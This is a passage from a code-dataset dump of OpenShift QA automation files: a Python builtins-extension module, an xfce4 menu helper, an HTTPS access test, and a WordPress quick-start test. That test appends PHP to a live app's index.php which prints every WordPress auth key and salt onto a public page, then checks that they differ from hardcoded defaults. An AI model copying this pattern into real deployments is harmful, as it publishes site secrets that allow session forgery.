OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RegisterWithInvalidEmail)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_122257.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6269373893737793, "alphanum_fraction": 0.6378642320632935, "avg_line_length": 26.39702796936035, "blob_id": "74e26b0826db8e01d34549590a3f48a3ca5cc664", "content_id": "2b1f7c5932a3fcfd0c2007771de4ba03b99d67cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12904, "license_type": "no_license", "max_line_length": 92, "num_lines": 471, "path": "/automation/open/lib/supports/nmsbuiltins.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# vim:ts=4:sw=4\n# License: LGPL\n\n\"\"\"\nThis module contains extra functions and constants that are inserted into\nPython's global (__builtin__) namespace. Only truly useful and general\nfunctions should go here. Also, things that fix Python's \"warts\" can go here.\nThis module, when imported, effectively extends the set of Python builtins.\n\n\n\"\"\"\nimport sys\n\n# works like None, but is callable\nclass NULLType(type):\n\tdef __new__(cls, name, bases, dct):\n\t\treturn type.__new__(cls, name, bases, dct)\n\tdef __init__(cls, name, bases, dct):\n\t\tsuper(NULLType, cls).__init__(name, bases, dct)\n\tdef __str__(cls):\n\t\treturn \"NULL\"\n\tdef __repr__(cls):\n\t\treturn \"\"\n\tdef __nonzero__(cls):\n\t\treturn False\n\tdef __call__(*args):\n\t\treturn None\nNULL = NULLType(\"NULL\", (type,), {})\n\n# shortcuts to save time\nsow = sys.stdout.write\nsew = sys.stderr.write\n# the embedded vim interpreter replaces stdio with objects that don't have a\n# flush method!\ntry: \n\tsoflush = sys.stdout.flush\nexcept AttributeError:\n\tsoflush = NULL\ntry:\n\tseflush = sys.stderr.flush\nexcept AttributeError:\n\tseflush = NULL\n\nclass Enum(int):\n\t__slots__ = (\"_name\")\n\tdef __new__(cls, val, name=None): # name must be optional for unpickling to work\n\t\tv = int.__new__(cls, val)\n\t\tv._name = str(name)\n\t\treturn v\n\tdef __getstate__(self):\n\t\treturn int(self), self._name\n\tdef __setstate__(self, args):\n\t\ti, self._name = args\n\tdef __str__(self):\n\t\treturn self._name\n\tdef __repr__(self):\n\t\treturn \"%s(%d, %r)\" % (self.__class__.__name__, self, self._name)\n\nclass Enums(list):\n\tdef __init__(self, *init):\n\t\tfor i, val in enumerate(init):\n\t\t\tif issubclass(type(val), list):\n\t\t\t\tfor j, subval in enumerate(val):\n\t\t\t\t\tself.append(Enum(i+j, str(subval)))\n\t\t\telif isinstance(val, Enum):\n\t\t\t\tself.append(val)\n\t\t\telse:\n\t\t\t\tself.append(Enum(i, str(val)))\n\tdef __repr__(self):\n\t\treturn \"%s(%s)\" % (self.__class__.__name__, list.__repr__(self))\n\n# return a mapping from integer to the Enum.\ndef enummap(*enums):\n return dict(map(lambda enum: (int(enum), enum), enums))\n\n# return a mapping from Enum name to the enum.\ndef enummapstr(*enums):\n return dict(map(lambda enum: (str(enum), enum), enums))\n\n# emulate an unsigned 32 bit and 64 bit ints with a long\nclass unsigned(long):\n\tfloor = 0L\n\tceiling = 4294967295L\n\tbits = 32\n\t_mask = 0xFFFFFFFFL\n\tdef __new__(cls, val):\n\t\treturn long.__new__(cls, val)\n\tdef __init__(self, val):\n\t\tif val < self.floor or val > self.ceiling:\n\t\t\traise OverflowError, \"value %s out of range for type %s\" % (val, self.__class__.__name__)\n\tdef __repr__(self):\n\t\treturn \"%s(%sL)\" % (self.__class__.__name__, self)\n\tdef __add__(self, other):\n\t\treturn self.__class__(long.__add__(self, other))\n\tdef __sub__(self, other):\n\t\treturn self.__class__(long.__sub__(self, other))\n\tdef __mul__(self, other):\n\t\treturn self.__class__(long.__mul__(self, other))\n\tdef __floordiv__(self, other):\n\t\treturn self.__class__(long.__floordiv__(self, other))\n\tdef __mod__(self, other):\n\t\treturn self.__class__(long.__mod__(self, other))\n\tdef __divmod__(self, other):\n\t\treturn self.__class__(long.__divmod__(self, other))\n\tdef __pow__(self, other, modulo=None):\n\t\treturn self.__class__(long.__pow__(self, other, modulo))\n\tdef __lshift__(self, other):\n\t\treturn self.__class__(long.__lshift__(self, other) & self._mask)\n\tdef __rshift__(self, other):\n\t\treturn self.__class__(long.__rshift__(self, other))\n\tdef __and__(self, other):\n\t\treturn self.__class__(long.__and__(self, other))\n\tdef __xor__(self, other):\n\t\treturn self.__class__(long.__xor__(self, other))\n\tdef __or__(self, other):\n\t\treturn self.__class__(long.__or__(self, other))\n\tdef __div__(self, other):\n\t\treturn self.__class__(long.__div__(self, other))\n\tdef __truediv__(self, other):\n\t\treturn self.__class__(long.__truediv__(self, other))\n\tdef __neg__(self):\n\t\treturn self.__class__(long.__neg__(self))\n\tdef __pos__(self):\n\t\treturn self.__class__(long.__pos__(self))\n\tdef __abs__(self):\n\t\treturn self.__class__(long.__abs__(self))\n\tdef __invert__(self):\n\t\treturn self.__class__(long.__invert__(self))\n\tdef __radd__(self, other):\n\t\treturn self.__class__(long.__radd__(self, other))\n\tdef __rand__(self, other):\n\t\treturn self.__class__(long.__rand__(self, other))\n\tdef __rdiv__(self, other):\n\t\treturn self.__class__(long.__rdiv__(self, other))\n\tdef __rdivmod__(self, other):\n\t\treturn self.__class__(long.__rdivmod__(self, other))\n\tdef __rfloordiv__(self, other):\n\t\treturn self.__class__(long.__rfloordiv__(self, other))\n\tdef __rlshift__(self, other):\n\t\treturn self.__class__(long.__rlshift__(self, other))\n\tdef __rmod__(self, other):\n\t\treturn self.__class__(long.__rmod__(self, other))\n\tdef __rmul__(self, other):\n\t\treturn self.__class__(long.__rmul__(self, other))\n\tdef __ror__(self, other):\n\t\treturn self.__class__(long.__ror__(self, other))\n\tdef __rpow__(self, other):\n\t\treturn self.__class__(long.__rpow__(self, other))\n\tdef __rrshift__(self, other):\n\t\treturn self.__class__(long.__rrshift__(self, other))\n\tdef __rshift__(self, other):\n\t\treturn self.__class__(long.__rshift__(self, other))\n\tdef __rsub__(self, other):\n\t\treturn self.__class__(long.__rsub__(self, other))\n\tdef __rtruediv__(self, other):\n\t\treturn self.__class__(long.__rtruediv__(self, other))\n\tdef __rxor__(self, other):\n\t\treturn self.__class__(long.__rxor__(self, other))\n\n\nclass unsigned64(unsigned):\n\tfloor = 0L\n\tceiling = 18446744073709551615L\n\tbits = 64\n\t_mask = 0xFFFFFFFFFFFFFFFFL\n\n# a list that self-maintains a sorted order\nclass sortedlist(list):\n def insort(self, x):\n hi = len(self)\n lo = 0\n while lo < hi:\n mid = (lo+hi)//2\n if x < self[mid]:\n hi = mid\n else:\n lo = mid+1\n self.insert(lo, x)\n append = insort\n\n# print helpers\ndef _printobj(obj):\n\tsow(str(obj))\n\tsow(\" \")\n\ndef _printerr(obj):\n\tsew(str(obj))\n\tsew(\" \")\n\ndef Write(*args):\n\tmap (_printobj, args)\n\tsoflush()\n\ndef Print(*args):\n\t\"\"\"Print is a replacement for the built-in print statement. Except that it\n\tis a function object. \"\"\"\n\tmap (_printobj, args)\n\tsow(\"\\n\")\n\tsoflush()\n\ndef Printerr(*args):\n\t\"\"\"Printerr writes to stderr.\"\"\"\n\tmap(_printerr, args)\n\tsew(\"\\n\")\n\tseflush()\n\ndef IF(test, tv, fv=None):\n\t\"\"\"Functional 'if' test. \"\"\"\n\tif test:\n\t\treturn tv\n\telse:\n\t\treturn fv\n\ndef sgn(val):\n\t\"\"\"Sign function. Returns -1 if val negative, 0 if zero, and 1 if positive.\"\"\"\n\ttry:\n\t\treturn val.__sgn__()\n\texcept AttributeError:\n\t\ttv = type(val)\n\t\tif val == 0:\n\t\t\treturn tv(0)\n\t\tif val > 0:\n\t\t\treturn tv(1)\n\t\telse:\n\t\t\treturn tv(-1)\n\ndef add2builtin(name, obj):\n\tsetattr(sys.modules['__builtin__'], name, obj)\n\ndef add_exception(excclass, name=None):\n\tsetattr(sys.modules['__builtin__'], name or excclass.__name__, excclass)\n\nclass Queue(list):\n\tdef push(self, obj):\n\t\tself.insert(0, obj)\n\nclass Stack(list):\n\tdef push(self, obj):\n\t\tself.append(obj)\n\n# a self-substituting string object. Just set attribute names to mapping names\n# that are given in the initializer string.\nclass mapstr(str):\n\tdef __new__(cls, initstr, **kwargs):\n\t\ts = str.__new__(cls, initstr)\n\t\treturn s\n\tdef __init__(self, initstr, **kwargs):\n\t\td = {}\n\t\tfor name in _findkeys(self):\n\t\t\td[name] = kwargs.get(name, None)\n\t\tself.__dict__[\"_attribs\"] = d\n\tdef __setattr__(self, name, val):\n\t\tif name not in self.__dict__[\"_attribs\"].keys():\n\t\t\traise AttributeError, \"invalid attribute name %r\" % (name,)\n\t\tself.__dict__[\"_attribs\"][name] = val\n\tdef __getattr__(self, name):\n\t\ttry:\n\t\t\treturn self.__dict__[\"_attribs\"][name]\n\t\texcept KeyError:\n\t\t\traise AttributeError, \"Invalid attribute %r\" % (name,)\n\tdef __str__(self):\n\t\tif None in self._attribs.values():\n\t\t\traise ValueError, \"one of the attributes %r is not set\" % (self._attribs.keys(),)\n\t\treturn self % self._attribs\n\tdef __call__(self, **kwargs):\n\t\tfor name, value in kwargs.items():\n\t\t\tsetattr(self, name, value)\n\t\treturn self % self._attribs\n\tdef __repr__(self):\n\t\treturn \"%s(%s)\" % (self.__class__.__name__, str.__repr__(self))\n\tdef attributes(self):\n\t\treturn self._attribs.keys()\n\nimport re\n_findkeys = re.compile(r\"%\\((\\w+)\\)\").findall\ndel re\n\n# make the friggin errno values global\nimport errno\nfor e in dir(errno):\n\tif e.startswith(\"E\"):\n\t\tadd2builtin(e, getattr(errno, e))\ndel e\n\n# metaclasses... returns a new class with given bases and class attributes\ndef newclass(name, *bases, **attribs):\n\tclass _NewType(type):\n\t\tdef __new__(cls):\n\t\t\treturn type.__new__(cls, name, bases, attribs)\n\treturn _NewType()\n\n# curry function returns callable with some parameters already setup to run. \ndef curry(meth, *args, **kwargs):\n\tdef _lambda(*iargs, **ikwargs):\n\t\tiargs = args + iargs\n\t\tkwds = kwargs.copy()\n\t\tkwds.update(ikwargs)\n\t\treturn meth(*iargs, **kwds)\n\treturn _lambda\n\ndef debugmethod(meth):\n\tdef _lambda(*iargs, **ikwargs):\n\t\ttry:\n\t\t\treturn meth(*iargs, **ikwargs)\n\t\texcept:\n\t\t\tex, val, tb = sys.exc_info()\n\t\t\timport debugger\n\t\t\tdebugger.post_mortem(ex, val, tb)\n\treturn _lambda\n\n# property to make system call methods safe from EINTR\ndef systemcall(meth):\n\tdef systemcallmeth(*args, **kwargs):\n\t\twhile 1:\n\t\t\ttry:\n\t\t\t\trv = meth(*args, **kwargs)\n\t\t\texcept EnvironmentError, why:\n\t\t\t\tif why.args and why.args[0] == errno.EINTR:\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\traise\n\t\t\telse:\n\t\t\t\tbreak\n\t\treturn rv\n\treturn systemcallmeth\n\n\ndef removedups(s):\n\t\"\"\"Return a list of the elements in s, but without duplicates.\nThanks to Tim Peters for fast method.\n\t\"\"\"\n\tn = len(s)\n\tif n == 0:\n\t\treturn []\n\tu = {}\n\ttry:\n\t\tfor x in s:\n\t\t\tu[x] = 1\n\texcept TypeError:\n\t\tdel u # move on to the next method\n\telse:\n\t\treturn u.keys()\n\t# We can't hash all the elements. Second fastest is to sort,\n\t# which brings the equal elements together; then duplicates are\n\t# easy to weed out in a single pass.\n\ttry:\n\t\tt = list(s)\n\t\tt.sort()\n\texcept TypeError:\n\t\tdel t # move on to the next method\n\telse:\n\t\tassert n > 0\n\t\tlast = t[0]\n\t\tlasti = i = 1\n\t\twhile i < n:\n\t\t\tif t[i] != last:\n\t\t\t\tt[lasti] = last = t[i]\n\t\t\t\tlasti = lasti + 1\n\t\t\ti = i + 1\n\t\treturn t[:lasti]\n\t# Brute force is all that's left.\n\tu = []\n\tfor x in s:\n\t\tif x not in u:\n\t\t\tu.append(x)\n\treturn u\n\n\ndef pprint_list(clist, indent=0, width=74):\n\t\"\"\"pprint_list(thelist, [indent, [width]])\nPrints the elements of a list to the screen fitting the most elements\nper line. Should not break an element across lines. Sort of like word\nwrap for lists.\"\"\"\n\tindent = min(max(indent,0),width-1)\n\tif indent:\n\t\tprint \" \" * indent,\n\tprint \"[\",\n\tcol = indent + 2\n\tfor c in clist[:-1]:\n\t\tps = \"%r,\" % (c)\n\t\tcol = col + len(ps) + 1\n\t\tif col > width:\n\t\t\tprint\n\t\t\tcol = indent + len(ps) + 1\n\t\t\tif indent:\n\t\t\t\tprint \" \" * indent,\n\t\tprint ps,\n\tif col + len(clist[-1]) > width:\n\t\tprint\n\t\tif indent:\n\t\t\tprint \" \" * indent,\n\tprint \"%r ]\" % (clist[-1],)\n\ndef reorder(datalist, indexlist):\n\t\"\"\"reorder(datalist, indexlist)\n\tReturns a new list that is ordered according to the indexes in the\n\tindexlist.\t\n\te.g.\n\treorder([\"a\", \"b\", \"c\"], [2, 0, 1]) -> [\"c\", \"a\", \"b\"]\n\t\"\"\"\n\treturn [datalist[idx] for idx in indexlist]\n\ndef enumerate(collection):\n\t'Generates an indexed series: (0,coll[0]), (1,coll[1]) ...'\n\ti = 0\n\tit = iter(collection)\n\twhile 1:\n\t\tyield (i, it.next())\n\t\ti += 1\n\ndef str2hex(s):\n\tres = [\"'\"]\n\tfor c in s:\n\t\tres.append(\"\\\\x%02x\" % ord(c))\n\tres.append(\"'\")\n\treturn \"\".join(res)\n\nadd2builtin(\"add2builtin\", add2builtin)\nadd2builtin(\"add_exception\", add_exception)\nadd2builtin(\"newclass\", newclass)\nadd2builtin(\"curry\", curry)\nadd2builtin(\"debugmethod\", debugmethod)\nadd2builtin(\"systemcall\", systemcall)\nadd2builtin(\"NULL\", NULL)\nadd2builtin(\"Enum\", Enum)\nadd2builtin(\"Enums\", Enums)\nadd2builtin(\"enummap\", enummap)\nadd2builtin(\"enummapstr\", enummapstr)\nadd2builtin(\"sortedlist\", sortedlist)\nadd2builtin(\"Write\", Write)\nadd2builtin(\"Print\", Print)\nadd2builtin(\"WriteLn\", Print) # alias for Print\nadd2builtin(\"Printerr\", Printerr)\nadd2builtin(\"IF\", IF)\nadd2builtin(\"sgn\", sgn)\nadd2builtin(\"Queue\", Queue)\nadd2builtin(\"Stack\", Stack)\nadd2builtin(\"mapstr\", mapstr)\nadd2builtin(\"removedups\", removedups)\nadd2builtin(\"pprint_list\", pprint_list)\nadd2builtin(\"reorder\", reorder)\nadd2builtin(\"str2hex\", str2hex)\n# common enumerations\nadd2builtin(\"NO\", Enum(0, \"NO\"))\nadd2builtin(\"YES\", Enum(1, \"YES\"))\nadd2builtin(\"DEFAULT\", Enum(2, \"DEFAULT\"))\nadd2builtin(\"UNKNOWN\", Enum(3, \"UNKNOWN\"))\n\nif not hasattr(sys.modules['__builtin__'], \"True\"):\n\tadd2builtin(\"True\", Enum(1, \"True\"))\n\tadd2builtin(\"False\", Enum(0, \"False\"))\nif not hasattr(sys.modules['__builtin__'], \"enumerate\"):\n\tadd2builtin(\"enumerate\", enumerate)\nadd2builtin(\"unsigned\", unsigned)\nadd2builtin(\"unsigned64\", unsigned64)\n\nif __name__ == \"__main__\":\n TEST = mapstr(\"some%(one)s one\\nsome%(two)s three\\nsome%(three)s four\")\n print TEST.attributes()\n try:\n print TEST\n except ValueError:\n print \"got correct error from %r\" % TEST\n TEST.one = \"one\"\n TEST.two = \"thing\"\n TEST.three = \"where\"\n print TEST\n s = str(TEST) # makes new, substituted, string\n assert s == \"someone one\\nsomething three\\nsomewhere four\"\n print TEST.three\n" }, { "alpha_fraction": 0.5660169124603271, "alphanum_fraction": 0.574598491191864, "avg_line_length": 41.046390533447266, "blob_id": "0b2cfa042cdc522dbf2918a87a689e985af09fe3", "content_id": "1f9c4dbb8ca0be5e965722170acb8413c6781481", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8157, "license_type": "no_license", "max_line_length": 221, "num_lines": 194, "path": "/automation/open/testmodules/RT/quick_start/quick_start_wordpress.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys, re, time\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport testcase, common, OSConf\nimport rhtest\nfrom quick_start_test import QuickStartTest\n\n# Global variables\nCODE = \"\"\"\n$_secure_tokens = array(\n 'AUTH_KEY',\n 'SECURE_AUTH_KEY',\n 'LOGGED_IN_KEY',\n 'NONCE_KEY',\n 'AUTH_SALT',\n 'SECURE_AUTH_SALT',\n 'LOGGED_IN_SALT',\n 'NONCE_SALT'\n);\n\nprint \"<table>\";\nforeach ($_secure_tokens as $key) {\n printf (\"<tr><td>%s</td><td>%s</td></tr>\",$key,eval(\"return $key;\"));\n}\nprint \"</table>\";\n\"\"\"\n\nDEFAULT_AUTH = { \"AUTH_KEY\" : 'w*lE&r=t-;!|rhdx5}vlF+b=+D>a)R:nTY1Kdrw[~1,xDQS]L&PA%uyZ2:w6#ec',\n \"SECURE_AUTH_KEY\" : '}Sd%ePgS5R[KwDxdBt56(DM:0m1^4)-k6_p8}|C:[-ei:&qA)j!X`:7d-krLZM*5',\n \"LOGGED_IN_KEY\" : '$l^J?o)!zhp6s[-x^ckF}|BjU4d+(g1as)n/Q^s+k|,ZZc@E^h%Rx@VTm|0|?]6R',\n \"NONCE_KEY\" : '#f^JM8d^!sVsq]~|4flCZHdaTy.-I.f+1tc[!h?%-+]U}|_8qc K=k;]mXePl-4v',\n \"AUTH_SALT\" : 'I_wL2t!|mSw_z_ zyIY:q6{IHw:R1yTPAO^%!5,*bF5^VX`5aO4]D=mtu~6]d}K?',\n \"SECURE_AUTH_SALT\" : '&%j?6!d<3IR%L[@iz=^OH!oHRXs4W|D,VCD7w%TC.uUa`NpOH_XXpGtL$A]{+pv9',\n \"LOGGED_IN_SALT\" : 'N<mft[~OZp0&Sn#t(IK2px0{KloRcjvIJ1+]:,Ye]>tb*_aM8P&2-bU~_Z>L/n(k',\n \"NONCE_SALT\" : 'u E-DQw%[k7l8SX=fsAVT@|_U/~_CUZesq{v(=y2}#X&lTRL{uOVzw6b!]`frTQ|',\n}\n\nclass OpenShiftTest(rhtest.Test):\n ITEST = ['DEV', 'STG', 'INT']\n\n def initialize(self):\n self.steps_list = []\n self.summary = \"[Runtime][rhc-cartridge]quick-start example: Wordpress\"\n self.app_name = \"wordpress\"\n self.new_app_name = \"wordpress2\"\n self.app_type = common.app_types[\"php\"]\n self.git_repo = self.app_name\n self.git_upstream_url = \"git://github.com/openshift/wordpress-example.git\"\n common.env_setup()\n\n def finalize(self):\n pass\n\n\nclass QuickStartWordpress(OpenShiftTest):\n\n def get_auth(self, app_name):\n app_url = OSConf.get_app_url(app_name)\n for i in range(4):\n (ret, output) = common.command_getstatusoutput(\"curl -H 'Pragma: no-cache' '%s'\" % (app_url), True)\n if ret == 0:\n break\n time.sleep(5)\n lst = re.findall(r\"(?<=<td>).*?(?=</td>)\", output, re.S)\n tokens = dict()\n for i in range(0, len(lst), 2):\n tokens[lst[i]] = lst[i+1]\n return tokens\n\n def modify_app(self, app_name):\n global CODE\n time.sleep(10)\n cmds = [\n \"cd %s\" % (app_name),\n \"git remote add upstream -m master %s\" % (self.git_upstream_url),\n \"git pull -s recursive -X theirs upstream master\",\n ]\n (ret, output) = common.command_getstatusoutput(\" && \".join(cmds))\n if ret != 0:\n return ret\n try:\n f = file(\"%s/php/index.php\" % (app_name), \"a\")\n f.write(CODE)\n f.close()\n except IOError:\n self.info(\"Failed to edit %s/php/index.php\" % (app_name))\n cmds = [\n \"cd %s\" % (app_name),\n \"git add .\",\n \"git commit -amt\",\n \"git push\",\n ]\n (ret, output) = common.command_getstatusoutput(\" && \".join(cmds))\n return ret\n\n def verify1(self, app_name):\n global DEFAULT_AUTH\n self.tokens = self.get_auth(app_name)\n (ret, output) = common.command_getstatusoutput(\"rhc app restart -a %s -l %s -p '%s' -d %s\" % (app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS), True)\n self.tokens_restart = self.get_auth(app_name)\n for key in self.tokens.keys():\n if self.tokens[key] == DEFAULT_AUTH[key]:\n return self.failed(\"%s failed: The auth info is the same as default - %s\" % (self.__class__.__name__, key))\n for key in self.tokens.keys():\n if self.tokens[key] != self.tokens_restart[key]:\n return self.failed(\"%s failed: The auth info becomes different after restarting - %s\" % (self.__class__.__name__, key))\n return 0\n\n def verify2(self, app_name):\n self.tokens2 = self.get_auth(app_name)\n for key in self.tokens.keys():\n if self.tokens[key] == self.tokens2[key]:\n return self.failed(\"%s failed: The auth info is the same as the previous app - %s\" % (self.__class__.__name__, key))\n return 0\n\n def test_method(self):\n global DEFAULT_AUTH\n\n # 1. Create app\n self.steps_list.append(testcase.TestCaseStep(\"Create an %s app: %s\" % (self.app_type, self.app_name),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n # 2. Embed mysql to the app\n self.steps_list.append(testcase.TestCaseStep(\"Embed mysql-5.1 to it\",\n common.embed,\n function_parameters=[self.app_name, \"add-\" + common.cartridge_types[\"mysql\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"mysql should be embedded successfully\",\n expect_return=0))\n # 3. Modify the app git repo\n self.steps_list.append(testcase.TestCaseStep(\"Modify the app git repo\",\n self.modify_app,\n function_parameters=[self.app_name,],\n expect_description=\"git push should succeed\",\n expect_return=0))\n # 4. Verify the auth info is different from the default one and restart won't change the auth info\n self.steps_list.append(testcase.TestCaseStep(\"Modify the app git repo\",\n self.verify1,\n function_parameters=[self.app_name,],\n expect_description=\"git push should succeed\",\n expect_return=0))\n # 5. Create a new wordpress app\n self.steps_list.append(testcase.TestCaseStep(\"Create another %s app: %s\" % (self.app_type, self.new_app_name),\n common.create_app,\n function_parameters=[self.new_app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n # 6. Embed mysql to the app\n self.steps_list.append(testcase.TestCaseStep(\"Embed mysql-5.1 to the new app\",\n common.embed,\n function_parameters=[self.new_app_name, \"add-\" + common.cartridge_types[\"mysql\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"mysql should be embedded successfully\",\n expect_return=0))\n # 7. Modify the new app git repo\n self.steps_list.append(testcase.TestCaseStep(\"Modify the new app git repo\",\n self.modify_app,\n function_parameters=[self.new_app_name,],\n expect_description=\"git push should succeed\",\n expect_return=0))\n # 8. Verify the auth info is different from the previous app\n self.steps_list.append(testcase.TestCaseStep(\"Verify the auth info is different from the previous app\",\n self.verify2,\n function_parameters=[self.new_app_name,],\n expect_description=\"git push should succeed\",\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartWordpress)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6959620118141174, "alphanum_fraction": 0.7045130729675293, "avg_line_length": 23.172412872314453, "blob_id": "9b0e9fc74815e4b75d431b222d5b30ab6afd4103", "content_id": "82140aff4c48ca2f263a8c24f27d387bd1c2af6b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2105, "license_type": "no_license", "max_line_length": 79, "num_lines": 87, "path": "/automation/open/lib/supports/XML/xfce4.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n# -*- coding: ascii -*-\n# vim:ts=4:sw=4:softtabstop=0:smarttab\n# \n#\n# Copyright (C) 1999-2004 Keith Dart <[email protected]>\n#\n# This library is free software; you can redistribute it and/or\n# modify it under the terms of the GNU Lesser General Public\n# License as published by the Free Software Foundation; either\n# version 2.1 of the License, or (at your option) any later version.\n#\n# This library is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# Lesser General Public License for more details.\n\n\"\"\"\nTools for working with the xfce4 environment.\n\n\n\"\"\"\n\nimport dtds.xfdesktop_menu\n\nimport POM\n\nclass XFCE4Menu(POM.POMDocument):\n\tDOCTYPE = \"<!DOCTYPE xfdesktop-menu>\\n\"\n\n\tdef emit(self, fo):\n\t\tpp = POM.BeautifulWriter(fo)\n\t\tsuper(XFCE4Menu, self).emit(pp)\n\n\tdef add_submenu(self, **attribs):\n\t\treturn self.root.add_submenu(**attribs)\n\n\tdef add_title(self, **attribs):\n\t\tself.root.add_title(**attribs)\n\n\tdef add_app(self, **attribs):\n\t\tself.root.add_app(**attribs)\n\n\tdef add_separator(self):\n\t\tself.root.add_separator()\n\n\tdef add_include(self, **attribs):\n\t\tself.root.add_include(**attribs)\n\n\t\nclass MenuMixin(object):\n\tdef add_title(self, **attribs):\n\t\ttitle = dtds.xfdesktop_menu.Title(**attribs)\n\t\tself.append(title)\n\t\n\tdef add_app(self, **attribs):\n\t\tapp = dtds.xfdesktop_menu.App(**attribs)\n\t\tself.append(app)\n\n\tdef add_separator(self):\n\t\tself.append(dtds.xfdesktop_menu.Separator())\n\t\n\tdef add_include(self, **attribs):\n\t\tpass\n\n\tdef add_submenu(self, **attribs):\n\t\tMenu = newclass(\"Menu\", MenuMixin, dtds.xfdesktop_menu.Menu)\n\t\tmenu = Menu(**attribs)\n\t\tself.append(menu)\n\t\treturn menu\n\t\n\n\n# factory for menu files\ndef new_menu():\n\tdoc = XFCE4Menu(dtds.xfdesktop_menu)\n\tRootMenu = newclass(\"RootMenu\", MenuMixin, dtds.xfdesktop_menu.Xfdesktop_menu)\n\troot = RootMenu()\n\tdoc.set_root(root)\n\treturn doc\n\ndef open_menu(filename):\n\tfo = file(filename)\n\tdoc = XFCE4Menu(dtds.xfdesktop_menu)\n\tdoc.parseFile(fo)\n\tfo.close()\n\treturn doc\n\n\n" }, { "alpha_fraction": 0.6080992817878723, "alphanum_fraction": 0.618876576423645, "avg_line_length": 33.40449523925781, "blob_id": "77b5585e8554818cbfd8c69da798d3e5adb6c44d", "content_id": "0ea82e0dec6e913edb2f7ffc8d9d02e0f8e04b44", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3062, "license_type": "no_license", "max_line_length": 137, "num_lines": 89, "path": "/automation/open/testmodules/RT/cartridge/access_https_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\nFeb 10, 2012\n[US537][rhc-cartridge] Access an SSL secured version of user's application\nhttps://tcms.engineering.redhat.com/case/122433/\n\"\"\"\nimport os,sys,re\n\nimport testcase,common,OSConf\nimport rhtest\n#import database\n# user defined packages\nimport openshift\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n try:\n self.test_variant = self.config.test_variant\n except:\n print \"WARN: Missing OPENSHIFT_test_name, using php as default.\"\n self.test_variant = 'php'\n self.summary = \"[US537][rhc-cartridge] Access an SSL secured version of user's application\"\n\n self.app_name = \"app\"+self.test_variant\n self.app_type = common.app_types[self.test_variant]\n self.steps_list = []\n\n common.env_setup()\n\n def finalize(self):\n pass\n\nclass AccessHttpsApp(OpenShiftTest):\n def test_method(self):\n # 1. Create an app\n self.steps_list.append(testcase.TestCaseStep(\"1. Create an %s app\" % (self.test_variant),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n\n # 2.Access app using http proto\n self.steps_list.append(testcase.TestCaseStep(\"2.Access app using http proto\",\n common.grep_web_page,\n function_parameters=[self.get_app_url(self.app_name), \"Welcome to OpenShift\", \"-H 'Pragma: no-cache'\", 3, 4],\n expect_description=\"The app is available via http\",\n expect_return=0))\n\n # 3.Access app using http proto\n self.steps_list.append(testcase.TestCaseStep(\"3.Access app using https proto\",\n common.grep_web_page,\n function_parameters=[self.get_app_url(self.app_name, \"https\"), \"Welcome to OpenShift\", \"-k -H 'Pragma: no-cache'\", 3, 4],\n expect_description=\"The app is available via https\",\n expect_return=0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n case.add_clean_up(\"rm -rf %s\"%(self.app_name))\n\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n def get_app_url(self, app_name, proto=\"http\"):\n def get_app_url2(): \n return proto+\"://\"+OSConf.get_app_url(self.app_name)\n return get_app_url2\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(AccessHttpsApp)\n return suite\n\ndef 